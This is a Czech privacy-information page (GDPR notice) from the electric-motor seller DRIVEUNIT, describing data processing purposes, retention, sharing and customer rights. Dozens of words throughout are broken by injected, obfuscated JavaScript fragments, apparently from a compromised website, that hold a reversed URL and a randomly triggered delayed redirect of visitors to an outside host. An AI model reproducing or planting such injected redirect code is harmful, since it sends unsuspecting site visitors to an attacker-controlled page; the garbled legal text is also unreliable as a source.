Informace o zpracování osobních údajů

Souhlas se zpracováním osobních údajů GDPR

Společnost DRIVEUNIT, IČ: 02350262, se sídlem Lannova 2061/8, Nové Město, 110 00 Praha 1, zapsaná v obchodním rejstříku vedeném u Městského soudu v Praze pod spisovou značkou C 223949 (dále též jen jako „správce“), je předním prodejcem elektromotorů, elektopřevotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dovek, frekvenčních měničů, a dalších výrobků.

Společnost DRIVEUNT vždy velmi dbá na spokojenost svých zákazníků a plně respektuje jejich právo na soukromí. Společnost DRIVEUNIT proto v souladu s nařízením Evropského parlamentu a Rady (EU) 2016/679 o ochraně fyzických osob v souvislosti se zpracováním osobních údajů a o volném pohybu těchto údajů a o zrušení směrnice 95/46/ES (obecné nařízení o ochraně osobních údajů) (dále jen „GDPR“) vydává tyto Informace o zpracování osobních údajů, jejichž účelem je poskytnut Vám informace o zpracování osobních údajů zákazníků společnosti DRIVEUNIT

1. IDENTIFIKAČNÍ ÚDAJE SPRÁVCE OSOBNÍCH ÚDAJŮ

 1. Správcem Vašich osobních údajů jsme my, tedy společnost DRIVEUNIT, IČ: 02350262, Lannova 2061/8, Nové Město, 110 00 Praha 1.

2. ROZSAH ZPRACOVÁNÍ, ÚČEL ZPRACOVÁNÍ A PRÁVNÍ ZÁKLAD ZPRACOVÁNÍ

 1. Zpracováváme osobní údaje, které jste nám poskytli:
  • při registraci v našem internetovém obchodě, který je provozován na webových stránkách tory-gear.cz (dále jen „internetový obchod“), a který slouží k nákupu zboží;
  • za účelem koupě a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodání zboží nebo poskytnutí služby na provozovně, popř. jiným způsobem (emailem, telefonicky atd.);
  • za účelem zasílání obchodních sdělení (tzv. newslettrů) s informacemi o novinkách v našem sortimentu, akcích a slevách na některé zboží;
  • při návštěvě našeho internetového obchodu;
  • při poptávce zboží či na základě Vašich toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotazů.
 2. Zpracováváme zejména následující osobní údaje:
  • Identifikační údaje, zejména: jméno, příjmení, datum narození.
  • Kontaktní údaje, zejména: bydliště a adresa pro toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doručování, telefonní číslo, email.
  • Údaje spojené se zakoupením zboží, zejména: bankovní spojení, informace o zakoupeném zboží.
  • Informace o Vašich aktivitách v našem internetovém obchodě, zejména jaké zboží si prohlížíte. Skutečný rozsah zpracovávaných osobních údajů se vždy liší v závislosti na tom, v jakém postavení jste vůči nám, zda jste si zřídili uživatelský účet v internetovém obchodě, k jakému zpracování jste nám udělili souhlas, jaká je aktuální funkcionalita internetového obchodu apod. Vždy však vyžadujeme a zpracováváme osobní údaje jen v takovém rozsahu, který je nezbytný k toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dosažení účelů, za kterým je získáváme.
 3. Vaše osobní údaje zpracováváme za následujícími účely:
  • Zpracování osobních údajů za účelem splnění smlouvy – toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodání zboží/poskytnutí služby Pokud jste osobou, která si u nás chce objednat zboží nebo chce poskytnout službu, nebo jste osobou, které má být na základě smlouvy uzavřené s naším zákazníkem toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doručeno zboží či poskytnuta služba, zpracováváme Vaše osobní údaje nezbytné k tomu, aby mohla být objednávka řádně připravena a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doručena. Vaše osobní údaje tedy potřebujeme a zpracováváme za účelem uzavření a řádného splnění smlouvy. (Zpracování osobních údajů podle čl. 6 odst. 1 písm. b) GDPR)
  • Zpracování osobních údajů za účelem plnění našich právních povinností V některých případech musíme Vaše osobní údaje zpracovávat, jelikož nám tak ukládají právní předpisy. Jde zejména o povinnosti vyžatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dované zákonem o účetnictví a dalšími právními předpisy z oblasti daní.(Zpracování osobních údajů podle čl. 6 odst. 1 písm. c) GDPR)
  • Zpracování osobních údajů z důvodu našich oprávněných zájmů Vaše osobní údaje dále zpracováváme z důvodu našich oprávněných zájmů, kterými jsou:
  1. ochrana našich práv vyplývajících z uzavřené smlouvy, pokud toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dojde k jejímu porušení z Vaší strany, nebo pokud v souvislosti se smlouvou vůči nám uplatníte své nároky;
  2. zasílání obchodních sdělení zákazníkům ve smyslu § 7 odst. 3 zákona č. 480/2004 Sb., o některých službách informační společnosti a o změně některých zákonů (zákon o některých službách informační společnosti).(Zpracování osobních údajů podle čl. 6 odst. 1 písm. f) GDPR)
  • Zpracování osobních údajů na základě souhlasu V případě, že ke zpracování nemáme žádný z výše uvedených důvodů, provádíme zpracování osobních údajů s Vaším souhlasem. Poskytnutí takového souhlasu je zcela toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrovolné, nicméně v některých případech může být předpokladem poskytnutí určité služby. Souhlas se zpracováním osobních údajů lze kdykoliv odvolat, na předchozí zpracování to ale nemá již žádný vliv.Souhlas se zpracováním osobních údajů je vyžatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dován především v následujících případech:
  • zasílání obchodních sdělení ve smyslu § 7 odst. 2 zákona č. 480/2004 Sb., o některých službách informační společnosti a o změně některých zákonů (zákon o některých službách informační společnosti): Pokud jste se přihlásili k odběru obchodních sdělení (tzv. newsletterů), budeme Vám na emailovou adresu zasílat obchodní sdělení o novinkách v našem sortimentu a plánovaných akcích a slevách.
  • využívání cookies: Udělením souhlasu s užíváním cookies toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochází ke zpracování Vašich osobních údajů za účelem získání statistických dat o Vašem chování v našem internetovém obchodě. Tyto údaje nám butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dou sloužit ke zlepšení poskytování našich služeb a našeho internetového obchodu. 
 4. V některých případech může být jeden a tentýž osobní údaj zpracováván z různých důvodů (např. Vaši emailovou adresu můžeme potřebovat k tomu, abychom Vám zaslali potvrzení o objednávce a zároveň i k zasílání obchodních sdělení).

5. Ke zpracování Vašich osobních údajů toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochází prostředním výpočetní techniky, popř. i manuálním způsobem u osobních údajů v listinné potoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}době, a to za toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodržení všech bezpečnostních zásad pro správu a zpracování osobních údajů dle příslušných právních předpisů upravujících ochranu osobních údajů. Za tímto účelem jsme přijali příslušná technická a organizační opatření, která pravidelně prověřujeme a aktualizujeme.

3. DOBA ZPRACOVÁNÍ OSOBNÍCH ÚDAJŮ

 1. Osobní údaje jsou zpracovávány pouze po nezbytnou toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobu, která je individuální pro jednotlivé účely zpracování. Může se jednat o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobu nutnou k toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dosažení účelu, pro který byly osobní údaje získány, nebo o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobu, kterou stanoví právní předpis. Po uplynutí toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doby nezbytné pro zpracování jsou osobní údaje zlikvitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dovány.
 2. V případě udělení souhlasu ke zpracování osobních údajů k určitému účelu je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doba zpracování dána trváním souhlasu, není-li přímo v souhlasu uvedeno jinak. Souhlas můžete kdykoliv odvolat a tím zpracování ukončit.

4. SDÍLENÍ OSOBNÍCH ÚDAJŮ

 1. Vaše osobní údaje nesdílíme s nikým bez Vašeho souhlasu, pokud to právní předpisy nebo tyto Informace o zpracování osobních údajů neumožňují, nebo pokud nutnost sdílení nevyplývá z kupní smlouvy.
 2. Pro zpracování osobních údajů můžeme využívat rovněž služeb dalších zpracovatelů, kteří osobní údaje zpracovávají pouze podle našich pokynů a pro účely, které jsou výše uvedené. Mezi tyto zpracovatele patří poskytovatelé služeb nezbytných pro náš provoz, především:
  • poskytovatelé pro správu účetnictví a daní;
  • poskytovatelé ICT služeb;
  • poskytovatelé poštovních služeb.
 3. Vaše osobní údaje mohou být na základě zákonné povinnosti či žátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dosti předány též třetím subjektům, které disponují zákonnou pravomocí vyžatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dovat předání předmětných osobních údajů.
 4. Vyjma výše uvedených případů s Vašimi osobnímu údaji nikterak neobchodujeme, nikomu je neprodáváme ani je s nikým nevyměňujeme.
 5. Při poskytování Vašich osobních údajů třetím stranám vždy dbáme s největší opatrností na to, aby byly Vaše osobní údaje zpřístupněny pouze v nezbytném rozsahu.

5. VAŠE PRÁVA V SOUVISLOSTI S OSOBNÍMI ÚDAJI

 1. Máte právo na potvrzení, zda jsou Vaše osobní údaje zpracovávány, či nikoliv, a pokud Vaše osobní údaje zpracováváme, máte právo na přístup k těmto osobním údajům a k informacím v rozsahu dle článku 15 GDPR, zejména na informace o:
  • účelu zpracování;
  • kategorii toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotčených osobních údajů;
  • příjemcích nebo kategoriích příjemců, kterým osobní údaje byly nebo butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dou zpřístupněny;
  • plánované toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}době, po kterou butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dou osobní údaje uloženy;
  • Vašich právech v souvislosti se zpracováním osobních údajů;
  • veškeré toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostupné informace o zdroji osobních údajů, pokud nebyly získány přímo od Vás;
  • skutečnosti, zda toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochází k automatizovanému rozhotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dování, včetně profilování.
 2. Ohledně osobních údajů máte dále mimo jiné:
  • právo na opravu osobních údajů dle čl. 16 GDPR, pokud zpracováváme nepřesné osobní údaje, které se Vás týkají, popř. máte právo na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doplnění neúplných osobních údajů;
  • právo na výmaz osobních údajů („právo být zapomenut“) dle čl. 17 GDPR;
  • právo na omezení zpracování Vašich osobních údajů dle čl. 18 GDPR;
  • právo na přenositelnost osobních údajů dle čl. 20 GDPR;
  • právo vznést námitku proti zpracování osobních údajů dle čl. 21 GDPR;
  • právo obrátit se na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dozorový úřad, kterým je Úřad pro ochranu osobních údajů.
 3. Při zjištění, že bylo porušeno zabezpečení osobních údajů, nebo při podezření, že bylo porušeno toto zabezpečení, posoudíme, zda skutečně toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}došlo k porušení zabezpečení, vyhodnotíme závažnost (bez rizika, nízké riziko, vysoké riziko) a podle závažnosti o porušení informujeme Vás i toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dozorový orgán, kterým je Úřad pro ochranu osobních údajů.
 4. V případě, že byste chtěli uplatnit některá z práv výše uvedených, nebo pokud zjistíte nebo se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domníváte, že toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochází k zpracování Vašich osobních údajů, které je v rozporu s ochrannou soukromého práva a osobního života nebo v rozporu se zákonem, neváhejte nás kdykoliv kontaktovat.
 5. Pokud ke zpracování Vašich osobních údajů toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochází pouze na základě souhlasu, máte právo tento souhlas kdykoliv odvolat.
 6. Pokud zjistíte nebo se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domníváte, že toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}došlo k porušení Vašich práv na ochranu osobních údajů, můžete se obrátit přímo na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dozorový úřad, kterým je Úřad pro ochranu osobních údajů.

6. UŽITEČNÉ KONTAKTY

DRIVEUNIT

Tichá 71

74274 Tichá

E-mail: www.driveunit.cz

Úřad pro ochranu osobních údajů

Pplk. Sochora 27

170 00 Praha 7

E-mail: https://www.uoou.cz